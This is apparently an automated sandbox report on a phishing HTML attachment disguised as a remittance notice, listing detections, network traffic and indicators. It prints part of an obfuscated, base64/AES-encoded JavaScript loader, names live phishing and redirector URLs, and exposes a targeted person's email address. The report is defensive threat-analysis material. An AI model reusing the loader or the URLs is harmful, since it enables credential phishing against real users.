Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REMITTANCE_10023Tdcj.html

Overview

General Information

Sample name:REMITTANCE_10023Tdcj.html
Analysis ID:1573438
MD5:cbdf049ecd2280b3597030f285a0525b
SHA1:9ff7ea63e6034223075ec72100dbf1d26d5cdc30
SHA256:eed7f8ceb456ba27cd4b2560c5bdaf18a4b5794f2245e61d202ba59b03e1e63f
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML Script injector detected
HTML document with suspicious name
HTML document with suspicious title
Form action URLs do not match main URL
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 4108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\REMITTANCE_10023Tdcj.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2028,i,13264855427996641456,9624318875190211204,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru/injqzmaorhcfcmoaukflhkifyNZxGCKNYHHPPVNBFPELBOVUYIFNOCEPIRMUSCAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://21.zomelore.ru/rwDHrVWE/#O#Falicia.duke@td... The script contains obfuscated code and URLs, which is a high-risk indicator (+3 points). It also includes dynamic code execution through the use of 'atob' to decode base64 strings, which can be used to execute remote or dynamic code (+3 points). Additionally, the script attempts to manipulate the DOM aggressively by writing HTML directly into the document, which is a moderate-risk indicator (+2 points). The script interacts with an unknown domain '21.zomelore.ru', which is suspicious and adds 1 point. The final score is capped at 7 due to the combination of high-risk behaviors and suspicious domain interaction.
Source: REMITTANCE_10023Tdcj.htmlHTTP Parser: Low number of body elements: 0
Source: file:///C:/Users/user/Desktop/REMITTANCE_10023Tdcj.htmlHTTP Parser: New script, src: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: file:///C:/Users/user/Desktop/REMITTANCE_10023Tdcj.htmlTab title: REMITTANCE_10023Tdcj.html
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: Form action: https://login.microsoftonline.com/savedusers?wreply=https://app.powerbi.com/signinredirect&appid=871c010f-5e61-4fb1-83ac-98610a7e9110&sso_reload=true powerbi microsoftonline
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: Number of links: 0
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: Title: Redirecting does not match URL
Source: https://bookworkstudio.net/res444.php?2-68747470733a2f2f32312e7a6f6d656c6f72652e72752f72774448725657452f-drongoHTTP Parser: var iuqgvllmkzvcmtzo = document.createelement("script");iuqgvllmkzvcmtzo.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(iuqgvllmkzvcmtzo);iuqgvllmkzvcmtzo.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoik2k2bnbzaktjsnlrrwdqztd0tzhzs1hsc0l1r2xnm1ppexnoz2pvvwfcmkzgnefsdulla21hvevnugwxyjrxxc91m1wvdlorv3zyzfzuandqnzbck29uq3d6uwpxmddzees1chdetzhwu1rcz2nns3hdcfpvmxjiquhjdxnqbev2skjzznlltwv1agc1swkrcgjordr6mjlasm5peufuzjzua3duzedjz280bstbrlwvszb0nhb2y290tlm0m2nwk2lmmm5cd29iz3nqd25nzedcu1lydtnwelgzwfazvxztn1hiagnrrctja1lhowlyrmdqvgpqalwvquz0smztbtzwtwnwekgrbmvma29yz1nqqni5k1jxywlmze5cwwj2txzzd3frxc9rzkq1nuzbzgn0qmqwbvjzykvhztkwaxpqbkvmovc5wtforevms1ranfrdbthwtuzvmvfubzh4nmfvwuvkaxzvqkhwcjjmn2d5k0iwoeniquzcl0vkzmtlaffzk2m3aehrmkznodftm0tivk9ic01qs3raavcrwlwvsdbkalpnn1vcb3hqueq5xc9znw4zmwxjsfdcl29bnzlpbknsnhfjzty5wny3dhdmttbprxdds2xjd2jyofpnrkx0rlpdnnjey2xndwtpclrqdnv2qlo4euvlrdnxnu1yr1hoalranfjitytgajrpuvfuvvhcl0horu1ksunsvmrzev...
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: Iframe src: https://login.microsoftonline.com/savedusers?wreply=https://app.powerbi.com/signinredirect&appid=871c010f-5e61-4fb1-83ac-98610a7e9110
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: Iframe src: https://login.microsoftonline.com/savedusers?wreply=https://app.powerbi.com/signinredirect&appid=871c010f-5e61-4fb1-83ac-98610a7e9110
Source: REMITTANCE_10023Tdcj.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/REMITTANCE_10023Tdcj.htmlHTTP Parser: No favicon
Source: https://21.zomelore.ru/rwDHrVWE/#O#Falicia.duke@tdcj.texas.govHTTP Parser: No favicon
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No favicon
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No favicon
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No favicon
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No favicon
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No favicon
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No favicon
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No favicon
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="author".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="author".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="author".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="author".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="author".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="author".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="copyright".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="copyright".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="copyright".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="copyright".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="copyright".. found
Source: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1HTTP Parser: No <meta name="copyright".. found
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f32312e7a6f6d656c6f72652e72752f72774448725657452f-drongo HTTP/1.1Host: bookworkstudio.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f32312e7a6f6d656c6f72652e72752f72774448725657452f-drongo HTTP/1.1Host: bookworkstudio.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rwDHrVWE/ HTTP/1.1Host: 21.zomelore.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://21.zomelore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://21.zomelore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://21.zomelore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://21.zomelore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://21.zomelore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f0940fe6c4f4373&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 21.zomelore.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://21.zomelore.ru/rwDHrVWE/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InByMlNjQjBmZTBobVovamVRUWI2R2c9PSIsInZhbHVlIjoiYkM3eVFJQ0lqVHNMMHlEejFHK2dOaU80NnBwMVc4U1U3RnN5NlRad0xRV0xkYzlQKzNOZW1CSHVuTHY0ZnFyYXc1VUZNaDhaRDhISnF3ZHFvRzZlWXNGYStxTFZPNmo0MzBLeG5DdHlML1NoeTRtQUVZMml4NUdHY2Z5aFB3UVYiLCJtYWMiOiJjZDQxMjRhZmI1NzlhNDVlNGMzNzk0MWIxYTdiYjMyNmUxYjg1ZTRiMjk4NDI3MTg2NDk2MzI1MWM2Y2IzZTFiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikt0Mkhkc0tqOFpqYkVGRzRPcUJJNXc9PSIsInZhbHVlIjoibDNmZHpxcU5QcnkyZTg3WkI0T1JvVG4ybHZSbmhnY2N2bHViUStZSEJ0UDhnUitRVnRMVGFaM0ZaUHhzTlYrRDN0MnI5NXMrbkMrRit3VUhQR1ZYUS9EQS9RSXd0T3FyM20zaWZYSnREcnUrRWVxZHVGanRBYTlaUDYrWWhvZ0oiLCJtYWMiOiI4ODUxZWEwYWQzMzc3YzdmOTQ2MmU2OGIxNDQ0YTAyOTFhM2VkZmExNmU5NWFhZGY4NzUyMTM4Njg4Y2I4NGFiIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f0940fe6c4f4373&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8f0940fe6c4f4373/1733959740238/e4911a032d42c9b8fd75eecc8cc040b583fab29ebc575e2b46036d09e5d291e6/mvbqwLy3Iwfs6lP HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
